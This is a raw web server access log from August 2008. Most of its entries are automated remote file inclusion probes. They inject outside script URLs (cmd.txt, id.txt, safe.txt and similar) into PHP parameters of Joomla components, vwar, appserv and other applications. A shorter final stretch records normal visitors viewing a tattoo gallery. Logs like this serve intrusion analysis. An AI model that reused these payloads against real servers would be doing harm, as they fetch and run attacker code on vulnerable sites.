80.67.26.157 - - [06/Aug/2008:19:00:50 -0500] "GET /logs/errors.php?error=http://www.iniciativaciudadana.com/xml/licence.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
80.67.26.157 - - [06/Aug/2008:19:00:50 -0500] "GET /errors.php?error=http://www.iniciativaciudadana.com/xml/licence.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
74.53.152.210 - - [06/Aug/2008:19:01:01 -0500] "GET /logs/access_log.1212883200///vwar/backup/errors.php?error=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
87.226.77.5 - - [06/Aug/2008:19:06:07 -0500] "GET /logs/access_log.1205366400//modules/xfsection/modify.php?dir_module=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.812"
87.226.77.5 - - [06/Aug/2008:19:06:08 -0500] "GET //modules/xfsection/modify.php?dir_module=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.812"
87.226.77.5 - - [06/Aug/2008:19:06:09 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.812"
210.245.226.25 - - [06/Aug/2008:19:06:31 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
66.225.218.2 - - [06/Aug/2008:19:06:53 -0500] "GET /logs/access_log.1213315200///vwar/backup/errors.php?error=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
85.10.140.162 - - [06/Aug/2008:19:06:54 -0500] "GET /logs/@rfihttp://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
85.10.140.162 - - [06/Aug/2008:19:06:55 -0500] "GET /@rfihttp://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
87.226.77.5 - - [06/Aug/2008:19:06:55 -0500] "GET /logs/access_log.1208044800//modules/xfsection/modify.php?dir_module=http://carnatz.as.ro/mic22.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.812"
81.176.226.164 - - [06/Aug/2008:19:07:21 -0500] "GET /logs/access_log.1212883200///vwar/backup/errors.php?error=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
209.97.201.148 - - [06/Aug/2008:19:07:55 -0500] "GET /logs//s_class.inc.php?DOCUMENT_ROOT=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
209.97.201.148 - - [06/Aug/2008:19:07:55 -0500] "GET //s_class.inc.php?DOCUMENT_ROOT=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
85.10.140.162 - - [06/Aug/2008:19:07:55 -0500] "GET /@rfihttp://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
75.125.143.162 - - [06/Aug/2008:19:08:24 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
75.125.143.162 - - [06/Aug/2008:19:08:24 -0500] "GET /errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
75.125.143.162 - - [06/Aug/2008:19:08:25 -0500] "GET /logs/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
66.225.218.2 - - [06/Aug/2008:19:08:33 -0500] "GET /logs/access_log.1213142400///vwar/backup/errors.php?error=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
75.125.143.162 - - [06/Aug/2008:19:09:14 -0500] "GET /logs/access_log.1212192000/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
74.220.215.216 - - [06/Aug/2008:19:09:24 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
74.220.215.216 - - [06/Aug/2008:19:09:24 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
74.220.215.216 - - [06/Aug/2008:19:09:24 -0500] "GET /errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
74.220.215.216 - - [06/Aug/2008:19:09:24 -0500] "GET /errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
74.220.215.216 - - [06/Aug/2008:19:09:24 -0500] "GET /logs/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
74.220.215.216 - - [06/Aug/2008:19:09:24 -0500] "GET /logs/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
87.101.4.49 - - [06/Aug/2008:19:10:28 -0500] "GET /logs/access_log.1214438400/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.newfoundlandartists.com/numb/id.txt?? HTTP/1.1" 404 354 "-""libwww-perl/5.79"
87.101.4.49 - - [06/Aug/2008:19:10:29 -0500] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.newfoundlandartists.com/numb/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
74.220.215.216 - - [06/Aug/2008:19:10:29 -0500] "GET /logs/access_log.1212192000/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
87.101.4.49 - - [06/Aug/2008:19:10:29 -0500] "GET /logs/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.newfoundlandartists.com/numb/id.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
74.220.215.216 - - [06/Aug/2008:19:10:42 -0500] "GET /logs/access_log.1212192000/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
86.58.154.237 - - [06/Aug/2008:19:10:46 -0500] "GET /logs//errors.php?errorhttp://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
86.58.154.237 - - [06/Aug/2008:19:10:46 -0500] "GET /logs//errors.php?errorhttp://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
86.58.154.237 - - [06/Aug/2008:19:10:46 -0500] "GET //errors.php?errorhttp://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
86.58.154.237 - - [06/Aug/2008:19:10:46 -0500] "GET //errors.php?errorhttp://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
213.133.102.211 - - [06/Aug/2008:19:11:16 -0500] "GET //appserv/main.php?appserv_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.806"
213.133.102.211 - - [06/Aug/2008:19:11:16 -0500] "GET /logs/access_log.1210291200//appserv/main.php?appserv_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.806"
213.133.102.211 - - [06/Aug/2008:19:11:17 -0500] "GET /logs//appserv/main.php?appserv_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.806"
213.133.102.211 - - [06/Aug/2008:19:11:17 -0500] "GET /logs/access_log.1212278400//appserv/main.php?appserv_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.806"
213.133.102.211 - - [06/Aug/2008:19:11:34 -0500] "GET /logs/access_log.1206230400//appserv/main.php?appserv_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.806"
213.133.102.211 - - [06/Aug/2008:19:11:44 -0500] "GET /logs/access_log.1204761600//appserv/main.php?appserv_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.806"
87.244.8.6 - - [06/Aug/2008:19:11:47 -0500] "GET //appserv/main.php?appserv_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
87.244.8.6 - - [06/Aug/2008:19:11:47 -0500] "GET /logs/access_log.1210291200//appserv/main.php?appserv_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
87.244.8.6 - - [06/Aug/2008:19:11:48 -0500] "GET /logs//appserv/main.php?appserv_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
213.133.102.211 - - [06/Aug/2008:19:12:02 -0500] "GET /logs/access_log.1209600000//appserv/main.php?appserv_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.806"
87.101.4.49 - - [06/Aug/2008:19:12:06 -0500] "GET /logs/access_log.1212883200/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.newfoundlandartists.com/numb/id.txt?? HTTP/1.1" 404 354 "-""libwww-perl/5.79"
87.244.8.6 - - [06/Aug/2008:19:12:08 -0500] "GET /logs/access_log.1209600000//appserv/main.php?appserv_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
87.244.8.6 - - [06/Aug/2008:19:12:13 -0500] "GET /logs/access_log.1206230400//appserv/main.php?appserv_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
87.244.8.6 - - [06/Aug/2008:19:12:16 -0500] "GET /logs/access_log.1212278400//appserv/main.php?appserv_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
74.53.152.210 - - [06/Aug/2008:19:12:37 -0500] "GET /logs/access_log.1213315200///vwar/backup/errors.php?error=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
87.244.8.6 - - [06/Aug/2008:19:12:45 -0500] "GET /logs/access_log.1211068800//appserv/main.php?appserv_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
87.244.8.6 - - [06/Aug/2008:19:12:46 -0500] "GET /logs/access_log.1210550400//appserv/main.php?appserv_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
87.101.4.49 - - [06/Aug/2008:19:12:49 -0500] "GET /logs/access_log.1213142400/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.newfoundlandartists.com/numb/id.txt?? HTTP/1.1" 404 354 "-""libwww-perl/5.79"
89.111.172.23 - - [06/Aug/2008:19:13:05 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
66.225.218.2 - - [06/Aug/2008:19:13:33 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 312 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.225.218.2 - - [06/Aug/2008:19:13:33 -0500] "GET //?path%5Bdocroot%5D=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 200 1243 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
209.97.201.148 - - [06/Aug/2008:19:14:15 -0500] "GET /logs//s_browse.inc.php?DOCUMENT_ROOT=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
209.97.201.148 - - [06/Aug/2008:19:14:15 -0500] "GET //s_browse.inc.php?DOCUMENT_ROOT=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
74.53.152.210 - - [06/Aug/2008:19:14:21 -0500] "GET /logs/access_log.1213142400///vwar/backup/errors.php?error=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
66.225.218.2 - - [06/Aug/2008:19:15:20 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
66.225.218.2 - - [06/Aug/2008:19:15:21 -0500] "GET //?path%5Bdocroot%5D=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
66.225.218.2 - - [06/Aug/2008:19:15:21 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 200 94316 "-""libwww-perl/5.810"
85.10.140.162 - - [06/Aug/2008:19:15:39 -0500] "GET /logs/access_log.1214438400/@rfihttp://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.805"
85.10.140.162 - - [06/Aug/2008:19:15:39 -0500] "GET /@rfihttp://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
85.10.140.162 - - [06/Aug/2008:19:15:40 -0500] "GET /logs/access_log.1212883200/@rfihttp://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.805"
85.10.140.162 - - [06/Aug/2008:19:16:58 -0500] "GET /logs/access_log.1208044800//modules/xfsection/modify.php?dir_module=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
85.10.140.162 - - [06/Aug/2008:19:16:59 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
209.97.201.148 - - [06/Aug/2008:19:17:48 -0500] "GET /logs//s_class.inc.php?DOCUMENT_ROOT=http://sujianto.com/load.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
209.97.201.148 - - [06/Aug/2008:19:17:48 -0500] "GET //s_class.inc.php?DOCUMENT_ROOT=http://sujianto.com/load.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
66.225.218.2 - - [06/Aug/2008:19:18:09 -0500] "GET //?path%5Bdocroot%5D=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
81.176.226.164 - - [06/Aug/2008:19:18:38 -0500] "GET /logs/access_log.1213315200///vwar/backup/errors.php?error=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
81.176.226.164 - - [06/Aug/2008:19:20:16 -0500] "GET /logs/access_log.1213142400///vwar/backup/errors.php?error=http://www.gybog.com//robots.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
89.111.172.23 - - [06/Aug/2008:19:20:25 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
210.245.226.25 - - [06/Aug/2008:19:20:30 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
92.56.99.197 - - [06/Aug/2008:19:21:29 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
216.249.32.13 - - [06/Aug/2008:19:22:05 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.65"
216.249.32.13 - - [06/Aug/2008:19:22:05 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.65"
91.84.19.133 - - [06/Aug/2008:19:23:58 -0500] "GET /logs//errors.php?errorhttp://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
91.84.19.133 - - [06/Aug/2008:19:23:58 -0500] "GET //errors.php?errorhttp://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
128.121.50.50 - - [06/Aug/2008:19:24:15 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.65"
128.121.50.50 - - [06/Aug/2008:19:24:16 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.65"
74.220.215.216 - - [06/Aug/2008:19:24:35 -0500] "GET /logs/access_log.1206230400///vwar/backup/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
74.220.215.216 - - [06/Aug/2008:19:24:35 -0500] "GET /logs///vwar/backup/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.812"
86.58.154.237 - - [06/Aug/2008:19:25:17 -0500] "GET /logs//errors.php?errorhttp://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
86.58.154.237 - - [06/Aug/2008:19:25:17 -0500] "GET //errors.php?errorhttp://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
86.58.154.237 - - [06/Aug/2008:19:25:26 -0500] "GET /logs//errors.php?errorhttp://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
86.58.154.237 - - [06/Aug/2008:19:25:26 -0500] "GET //errors.php?errorhttp://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
74.220.215.216 - - [06/Aug/2008:19:25:34 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
74.220.215.216 - - [06/Aug/2008:19:25:50 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
74.220.215.216 - - [06/Aug/2008:19:25:50 -0500] "GET /logs/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
74.220.215.216 - - [06/Aug/2008:19:25:52 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
74.220.215.216 - - [06/Aug/2008:19:25:52 -0500] "GET /logs/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
83.103.23.40 - - [06/Aug/2008:19:27:21 -0500] "GET /logs/access_log.1212883200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jamesyong.net/main/media/test/safeon.txt? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
83.103.23.40 - - [06/Aug/2008:19:27:21 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jamesyong.net/main/media/test/safeon.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
83.103.23.40 - - [06/Aug/2008:19:27:21 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.jamesyong.net/main/media/test/safeon.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
58.25.217.217 - - [06/Aug/2008:19:29:15 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://lizartdisplay.com/di?? HTTP/1.1" 200 94311 "-""libwww-perl/5.79"
58.25.217.217 - - [06/Aug/2008:19:29:18 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://lizartdisplay.com/di?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
70.238.206.197 - - [06/Aug/2008:19:43:55 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_%28tattoo%29""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:43:55 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:43:55 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:43:59 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:43:59 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (compatible; Google Desktop)"
70.238.206.197 - - [06/Aug/2008:19:44:01 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:02 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:02 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:02 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:02 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:02 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:02 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:02 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:02 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:02 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:02 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:18 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:18 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:18 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:18 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:18 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:19 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:19 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:19 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:19 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:19 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:19 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
58.25.217.217 - - [06/Aug/2008:19:44:31 -0500] "GET /logs/scanhttp://www.aquaplant-chile.cl/oneadmin/faqsupport/readme.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.79"
70.238.206.197 - - [06/Aug/2008:19:44:32 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:32 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:32 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:32 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:32 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
70.238.206.197 - - [06/Aug/2008:19:44:32 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
